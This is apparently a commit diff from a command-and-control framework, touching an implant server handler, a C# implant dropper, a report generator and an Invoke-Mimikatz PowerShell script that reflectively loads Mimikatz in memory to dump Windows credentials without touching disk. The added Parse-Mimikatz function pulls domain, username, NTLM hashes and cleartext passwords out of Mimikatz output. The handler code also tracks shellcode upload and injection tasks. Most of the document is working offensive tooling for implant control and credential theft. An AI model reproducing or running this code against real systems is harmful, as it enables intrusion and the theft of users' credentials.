Truncated large output in CSV/HTML to stop this being > 100MB. Re-added Parse-Mimikatz feature. Updated CS dropper to work on Server 2003 with .NET v4.
parent
8a092df9d6
commit
1b76ccfe57
|
@ -149,7 +149,9 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
implant_type = "C#"
|
||||
if s.path == ("%s?p?c" % new_implant_url):
|
||||
implant_type = "C#"
|
||||
|
||||
if s.path == ("%s?d?c" % new_implant_url):
|
||||
implant_type = "C#"
|
||||
|
||||
if implant_type == "C#":
|
||||
cookieVal = (s.cookieHeader).replace("SessionID=","")
|
||||
decCookie = decrypt(KEY, cookieVal)
|
||||
|
@ -278,8 +280,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
||||
print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
|
||||
# What should this be now?
|
||||
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
|
||||
update_task(taskId, "Upload shellcode complete")
|
||||
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
|
||||
update_task(taskId, "Upload shellcode complete")
|
||||
print ("Upload shellcode complete")
|
||||
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")):
|
||||
update_task(taskId, "Upload shellcode complete")
|
||||
|
|
|
@ -174,7 +174,13 @@ public class Program
|
|||
{
|
||||
if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
|
||||
{
|
||||
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
|
||||
var u = "";
|
||||
try
|
||||
{
|
||||
u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
|
||||
} catch {
|
||||
u = System.Environment.UserName;
|
||||
}
|
||||
if (IsHighIntegrity())
|
||||
u += "*";
|
||||
var dn = System.Environment.UserDomainName;
|
||||
|
|
4
HTML.py
4
HTML.py
|
@ -403,6 +403,10 @@ __________ .__. _________ ________
|
|||
framelen = frame['RandomURI'].count()
|
||||
for x in range(0, framelen):
|
||||
try:
|
||||
if (len(frame['Output'][x]) > 1000032):
|
||||
print "[-] Truncating output as this row is over 10mb:"
|
||||
print frame['Command'][x]
|
||||
frame['Output'][x] = "Truncated"
|
||||
frame['RandomURI'][x]
|
||||
a = get_htmlimplant(str(frame['RandomURI'][x]))
|
||||
frame['RandomURI'][x] = a[11] + "\\" + a[2] + " @ " + a[3]
|
||||
|
|
|
@ -4,7 +4,7 @@ function Invoke-Mimikatz
|
|||
.SYNOPSIS
|
||||
|
||||
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
|
||||
dump credentials without ever writing the mimikatz binary to disk.
|
||||
dump credentials without ever writing the mimikatz binary to disk.
|
||||
The script has a ComputerName parameter which allows it to be executed against multiple computers.
|
||||
|
||||
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
|
||||
|
@ -19,7 +19,7 @@ Mimikatz version: 2.1.1-20180616 ()
|
|||
|
||||
.DESCRIPTION
|
||||
|
||||
Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any
|
||||
Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any
|
||||
functionality provided with Mimikatz.
|
||||
|
||||
.PARAMETER DumpCreds
|
||||
|
@ -356,7 +356,7 @@ $RemoteScriptBlock = {
|
|||
$e_res2Field.SetCustomAttribute($AttribBuilder)
|
||||
|
||||
$TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
|
||||
$IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
|
||||
$IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
|
||||
$Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
|
||||
|
||||
#Struct IMAGE_SECTION_HEADER
|
||||
|
@ -1563,7 +1563,7 @@ $RemoteScriptBlock = {
|
|||
# Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx
|
||||
if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
|
||||
-or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
|
||||
{
|
||||
{
|
||||
#Get the current memory address and update it based off the difference between PE expected base address and actual base address
|
||||
[IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))
|
||||
[IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])
|
||||
|
@ -1575,7 +1575,7 @@ $RemoteScriptBlock = {
|
|||
else
|
||||
{
|
||||
[IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
|
||||
}
|
||||
}
|
||||
|
||||
[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
|
||||
}
|
||||
|
@ -1848,7 +1848,7 @@ $RemoteScriptBlock = {
|
|||
)
|
||||
|
||||
#This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state.
|
||||
$ReturnArray = @()
|
||||
$ReturnArray = @()
|
||||
|
||||
$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
|
||||
[UInt32]$OldProtectFlag = 0
|
||||
|
@ -2050,7 +2050,7 @@ $RemoteScriptBlock = {
|
|||
$Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null
|
||||
$ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)
|
||||
|
||||
#Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then
|
||||
#Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then
|
||||
# call ExitThread
|
||||
Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp
|
||||
$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)
|
||||
|
@ -2281,9 +2281,9 @@ $RemoteScriptBlock = {
|
|||
|
||||
[IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)
|
||||
if ($PEHandle -eq [IntPtr]::Zero)
|
||||
{
|
||||
{
|
||||
Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)."
|
||||
}
|
||||
}
|
||||
[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null
|
||||
|
||||
|
||||
|
@ -2557,7 +2557,7 @@ $RemoteScriptBlock = {
|
|||
# {
|
||||
# Write-Verbose "Getting SeDebugPrivilege"
|
||||
# Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
|
||||
# }
|
||||
# }
|
||||
|
||||
if (($ProcId -ne $null) -and ($ProcId -ne 0))
|
||||
{
|
||||
|
@ -2743,3 +2743,107 @@ $results = Main;
|
|||
"Hostname: $HostName / $DomainSID";
|
||||
$results
|
||||
}
|
||||
|
||||
|
||||
|
||||
function Parse-Mimikatz {
|
||||
param(
|
||||
[Parameter(
|
||||
Position=0,
|
||||
Mandatory=$true,
|
||||
ValueFromPipeline=$true,
|
||||
ValueFromPipelineByPropertyName=$true)
|
||||
]
|
||||
[String[]]$raw
|
||||
)
|
||||
|
||||
# msv
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=msv :).*?(?=tspkg :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("NTLM")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=tspkg :).*?(?=wdigest :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Password")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=wdigest :).*?(?=kerberos :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Password")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
$results = $raw | Select-String -Pattern "(?s)(?<=kerberos :).*?(?=ssp :)" -AllMatches | %{$_.matches} | %{$_.value}
|
||||
if($results){
|
||||
foreach($match in $results){
|
||||
if($match.Contains("Domain")){
|
||||
$lines = $match.split("`n")
|
||||
foreach($line in $lines){
|
||||
if ($line.Contains("Username")){
|
||||
$username = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Domain")){
|
||||
$domain = $line.split(":")[1].trim()
|
||||
}
|
||||
elseif ($line.Contains("Password")){
|
||||
$password = $line.split(":")[1].trim()
|
||||
}
|
||||
}
|
||||
if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
|
||||
$domain+"\"+$username+":"+$password
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue